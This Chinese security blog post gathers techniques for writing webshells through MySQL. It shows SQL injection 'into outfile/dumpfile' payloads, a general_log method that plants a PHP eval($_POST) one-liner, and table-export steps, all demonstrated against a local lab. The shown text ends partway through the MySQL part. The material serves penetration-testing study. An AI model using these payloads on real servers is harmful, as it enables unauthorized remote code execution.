<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5"><title>常见数据库写入Webshell汇总 | ascotbe</title><meta name="description" content="常见数据库写入Webshell汇总"><meta name="author" content="ascotbe"><meta name="copyright" content="ascotbe"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><link rel="preconnect" href="//busuanzi.ibruce.info"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="常见数据库写入Webshell汇总"><meta name="twitter:description" content="常见数据库写入Webshell汇总"><meta name="twitter:image" content="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/108.jpg"><meta property="og:type" content="article"><meta property="og:title" content="常见数据库写入Webshell汇总"><meta property="og:url" content="https://www.ascotbe.com/2020/07/21/DatabaseWriteWebshell/"><meta property="og:site_name" content="ascotbe"><meta property="og:description" content="常见数据库写入Webshell汇总"><meta property="og:image" content="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/108.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = '2'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://www.ascotbe.com/2020/07/21/DatabaseWriteWebshell/"><link rel="prev" title="信息收集总结" href="https://www.ascotbe.com/2020/07/23/InformationGathering/"><link rel="next" title="解决安卓单向/双向认证导致无法抓包" href="https://www.ascotbe.com/2020/07/20/HttpCertificate/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://www.ascotbe.com/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  isHome: false,
  isPost: true
  
}</script><meta name="generator" content="Hexo 4.2.1"></head><body><canvas class="fireworks"></canvas><header> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">ascotbe</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/Loophole"><i class="fa-fw fa fa-link"></i><span> Loophole</span></a></div><div class="menus_item"><a class="site-page" href="/Taylor%20Swift"><i class="fa-fw fa fa-link"></i><span> Taylor Swift</span></a></div><div class="menus_item"><a class="site-page" href="/Links/"><i class="fa-fw fa fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> About</span></a></div></div></span></div></header><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.jpeg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">96</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/Loophole"><i class="fa-fw fa fa-link"></i><span> Loophole</span></a></div><div class="menus_item"><a class="site-page" href="/Taylor%20Swift"><i class="fa-fw fa fa-link"></i><span> Taylor Swift</span></a></div><div class="menus_item"><a class="site-page" href="/Links/"><i class="fa-fw fa fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> About</span></a></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><div class="sidebar-toc__content"><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#MySql数据库"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">MySql数据库</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#基于联合查询"><span class="toc_mobile_items-number">1.1.</span> <span class="toc_mobile_items-text">基于联合查询</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#基于非联合查询"><span class="toc_mobile_items-number">1.2.</span> <span class="toc_mobile_items-text">基于非联合查询</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#基于log日志写shell法"><span class="toc_mobile_items-number">1.3.</span> <span class="toc_mobile_items-text">基于log日志写shell法</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#基于创建再导出的方法"><span class="toc_mobile_items-number">1.4.</span> <span class="toc_mobile_items-text">基于创建再导出的方法</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#低权限利用"><span class="toc_mobile_items-number">1.5.</span> <span class="toc_mobile_items-text">低权限利用</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#Oracle数据库"><span class="toc_mobile_items-number">2.</span> <span class="toc_mobile_items-text">Oracle数据库</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#利用文件访问包写shell"><span class="toc_mobile_items-number">2.1.</span> <span class="toc_mobile_items-text">利用文件访问包写shell</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#SqlServer数据库"><span class="toc_mobile_items-number">3.</span> <span class="toc_mobile_items-text">SqlServer数据库</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#寻找绝对路径"><span class="toc_mobile_items-number">3.1.</span> <span class="toc_mobile_items-text">寻找绝对路径</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#利用xp-dirtree方法来寻找"><span class="toc_mobile_items-number">3.1.1.</span> <span class="toc_mobile_items-text">利用xp_dirtree方法来寻找</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-5"><a class="toc_mobile_items-link" href="#真实环境下的操作"><span class="toc_mobile_items-number">3.1.1.1.</span> <span class="toc_mobile_items-text">真实环境下的操作</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#利用xp-cmdshell方法来寻找"><span class="toc_mobile_items-number">3.1.2.</span> <span class="toc_mobile_items-text">利用xp_cmdshell方法来寻找</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#写入Webshell"><span class="toc_mobile_items-number">3.2.</span> <span class="toc_mobile_items-text">写入Webshell</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#利用xp-cmdshell命令写shell"><span class="toc_mobile_items-number">3.2.1.</span> <span class="toc_mobile_items-text">利用xp_cmdshell命令写shell</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#差异备份写shell"><span class="toc_mobile_items-number">3.2.2.</span> <span class="toc_mobile_items-text">差异备份写shell</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#log备份写shell"><span class="toc_mobile_items-number">3.2.3.</span> <span class="toc_mobile_items-text">log备份写shell</span></a></li></ol></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#参考文章"><span class="toc_mobile_items-number">4.</span> <span class="toc_mobile_items-text">参考文章</span></a></li></ol></div></div></div><div id="body-wrap"><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#MySql数据库"><span class="toc-number">1.</span> <span class="toc-text">MySql数据库</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#基于联合查询"><span class="toc-number">1.1.</span> <span class="toc-text">基于联合查询</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#基于非联合查询"><span class="toc-number">1.2.</span> <span class="toc-text">基于非联合查询</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#基于log日志写shell法"><span class="toc-number">1.3.</span> <span class="toc-text">基于log日志写shell法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#基于创建再导出的方法"><span class="toc-number">1.4.</span> <span class="toc-text">基于创建再导出的方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#低权限利用"><span class="toc-number">1.5.</span> <span class="toc-text">低权限利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Oracle数据库"><span class="toc-number">2.</span> <span class="toc-text">Oracle数据库</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#利用文件访问包写shell"><span class="toc-number">2.1.</span> <span class="toc-text">利用文件访问包写shell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SqlServer数据库"><span class="toc-number">3.</span> <span class="toc-text">SqlServer数据库</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#寻找绝对路径"><span class="toc-number">3.1.</span> <span class="toc-text">寻找绝对路径</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#利用xp-dirtree方法来寻找"><span class="toc-number">3.1.1.</span> <span class="toc-text">利用xp_dirtree方法来寻找</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#真实环境下的操作"><span class="toc-number">3.1.1.1.</span> <span class="toc-text">真实环境下的操作</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用xp-cmdshell方法来寻找"><span class="toc-number">3.1.2.</span> <span class="toc-text">利用xp_cmdshell方法来寻找</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#写入Webshell"><span class="toc-number">3.2.</span> <span class="toc-text">写入Webshell</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#利用xp-cmdshell命令写shell"><span class="toc-number">3.2.1.</span> <span class="toc-text">利用xp_cmdshell命令写shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#差异备份写shell"><span class="toc-number">3.2.2.</span> <span class="toc-text">差异备份写shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#log备份写shell"><span class="toc-number">3.2.3.</span> <span class="toc-text">log备份写shell</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考文章"><span class="toc-number">4.</span> <span class="toc-text">参考文章</span></a></li></ol></div></div></div><main id="content-outer"><div id="top-container" style="background-image: url(https://gitee.com/asc0t6e/Random-img/raw/master/Blog/108.jpg)"><div id="post-info"><div id="post-title"><div class="posttitle">常见数据库写入Webshell汇总</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 发表于 2020-07-21<span class="post-meta__separator">|</span><i class="fa fa-history fa-fw" aria-hidden="true"></i> 更新于 2020-07-29</time><div class="post-meta-wordcount"><div class="post-meta-pv-cv"><span><i class="fa fa-eye post-meta__icon fa-fw" aria-hidden="true"> </i>阅读量:</span><span id="busuanzi_value_page_pv"></span></div></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><blockquote>
<p>声明</p>
</blockquote>
<p>郑重声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！</p>
<blockquote>
<p>前言</p>
</blockquote>
<p>依旧是之前面试被毒打的问题，没玩过就玩一遍吧，目前只写了常见的3个数据库，如果后面又遇到其他的数据库在添加。</p>
<h2 id="MySql数据库"><a href="#MySql数据库" class="headerlink" title="MySql数据库"></a>MySql数据库</h2><p>前提条件</p>
<ul>
<li><p>数据库当前用户为root权限</p>
</li>
<li><p>知道当前网站的绝对路径</p>
</li>
<li><p>PHP的GPC为 off状态</p>
</li>
<li><p>写入的那个路径存在写入权限</p>
</li>
</ul>
<p>注意点：</p>
<blockquote>
<p>secure_file_priv参数说明</p>
</blockquote>
<p>这个参数用来限制数据导入和导出操作的效果，例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。</p>
<ul>
<li><p>如果这个参数为空，这个变量没有效果</p>
</li>
<li><p>如果这个参数设为一个目录名，MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在，MySQL服务不会创建它</p>
</li>
<li><p>如果这个参数为NULL，MySQL服务会禁止导入和导出操作。这个参数在MySQL 5.7.6版本引入</p>
</li>
</ul>
<p>如果遇到以下情况的话，使用SQL语句中的<code>outfile</code>是无法成功的，但是写入日志的方法是可以成功的</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show variables like &#39;%secure%&#39;;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/1.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721163145745" class="fancybox"><img alt="image-20200721163145745" title="image-20200721163145745" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/1.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<blockquote>
<p>开启secure_file_priv</p>
</blockquote>
<p>修改<strong>my.ini</strong>文件后需要重启MySql</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">secure_file_priv为NULL禁止导出文件secure_file_priv&#x3D;&quot;&quot;</span><br><span class="line">secure_file_priv指定地址限制导出地址只能在此secure_file_priv&#x3D;“D:&#x2F;”</span><br><span class="line">secure_file_priv为空可以导出到任意文件secure_file_priv&#x3D;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/2.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721164643432" class="fancybox"><img alt="image-20200721164643432" title="image-20200721164643432" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/2.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<blockquote>
<p>查看是否有写入权限</p>
</blockquote>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select group_concat(user,0x3a,file_priv) from mysql.user;</span><br><span class="line">出现Y，这就代表你有文件权限，N就是没有</span><br></pre></td></tr></table></figure></div>

<h3 id="基于联合查询"><a href="#基于联合查询" class="headerlink" title="基于联合查询"></a>基于联合查询</h3><p>注入点位置如下，后面使用的话会省略这段值</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;test&#x2F;Less-2&#x2F;?id&#x3D;1</span><br></pre></td></tr></table></figure></div>

<p>利用outfile方法</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UNION ALL SELECT 1,2,&quot;&lt;? phpinfo(); ?&gt;&quot; into outfile &quot;C:\\phpStudy\\PHPTutorial\\WWW\\test\123.txt&quot; --</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/3.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721182619518" class="fancybox"><img alt="image-20200721182619518" title="image-20200721182619518" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/3.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>可以发现写入成功了，值得注意的是我们写入的是在test目录和123.txt中间没有用双斜杠，这样写入的文件会被过滤了，直接写到了WWW目录而不是test目录里面</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/4.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721182654445" class="fancybox"><img alt="image-20200721182654445" title="image-20200721182654445" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/4.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>利用dumpfile方法，这种方法可以写入16进制数据</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UNION ALL SELECT 1,2,&quot;&lt;? phpinfo(); ?&gt;&quot; into dumpfile &quot;C:\\phpStudy\\PHPTutorial\\WWW\\test\123.txt&quot; --</span><br></pre></td></tr></table></figure></div>

<p>写入普通数据</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/5.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721183121847" class="fancybox"><img alt="image-20200721183121847" title="image-20200721183121847" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/5.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/6.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721183134285" class="fancybox"><img alt="image-20200721183134285" title="image-20200721183134285" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/6.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>把PHP内容写成16进制编码数据在写入</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/7.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721183645338" class="fancybox"><img alt="image-20200721183645338" title="image-20200721183645338" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/7.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/8.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721183709153" class="fancybox"><img alt="image-20200721183709153" title="image-20200721183709153" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/8.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<h3 id="基于非联合查询"><a href="#基于非联合查询" class="headerlink" title="基于非联合查询"></a>基于非联合查询</h3><div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">into outfile &quot;C:\\phpStudy\\PHPTutorial\\WWW\\123.txt&quot; fields terminated by &quot;&lt;? phpinfo(); ?&gt;&quot; %23 --</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/15.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200722114910448" class="fancybox"><img alt="image-20200722114910448" title="image-20200722114910448" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/15.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/16.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200722114926885" class="fancybox"><img alt="image-20200722114926885" title="image-20200722114926885" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/16.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<h3 id="基于log日志写shell法"><a href="#基于log日志写shell法" class="headerlink" title="基于log日志写shell法"></a>基于log日志写shell法</h3><p>先看看当前mysql下log日志的默认地址，同时也看下log日志是否为开启状态，记下来后面需要改回来的</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show variables like &#39;%general%&#39;;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/9.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721145256729" class="fancybox"><img alt="image-20200721145256729" title="image-20200721145256729" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/9.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>然后开启日志</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set global general_log &#x3D; on;</span><br></pre></td></tr></table></figure></div>

<p>设置日志写入位置</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set global general_log_file &#x3D; &#39;C:&#x2F;2.txt&#39;;</span><br></pre></td></tr></table></figure></div>

<p>写入日志</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &#39;&lt;?php eval($_POST[&#39;ascotbe&#39;]);?&gt;&#39;;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/10.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721150323748" class="fancybox"><img alt="image-20200721150323748" title="image-20200721150323748" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/10.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>修改为原来的路径</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set global general_log_file&#x3D;&#39;c:&#x2F;xxxxx&#x2F;xxxx&#39;</span><br></pre></td></tr></table></figure></div>

<p>关闭日志记录</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set global general_log &#x3D; off;</span><br></pre></td></tr></table></figure></div>

<h3 id="基于创建再导出的方法"><a href="#基于创建再导出的方法" class="headerlink" title="基于创建再导出的方法"></a>基于创建再导出的方法</h3><p>连接test数据库</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use test;</span><br></pre></td></tr></table></figure></div>

<p>搜索并删除存在的<strong>ascotbe</strong>这个表</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">drop table if exists ascotbe;</span><br></pre></td></tr></table></figure></div>

<p>创建这个表，在里边加个字段xxx</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">create table ascotbe(xxx text not null);</span><br></pre></td></tr></table></figure></div>

<p>在里面写入一句话</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">insert into ascotbe(xxx) values (&#39;&lt;?php phpinfo(); ?&gt;&#39;);</span><br></pre></td></tr></table></figure></div>

<p>然后把这句话导出来</p>
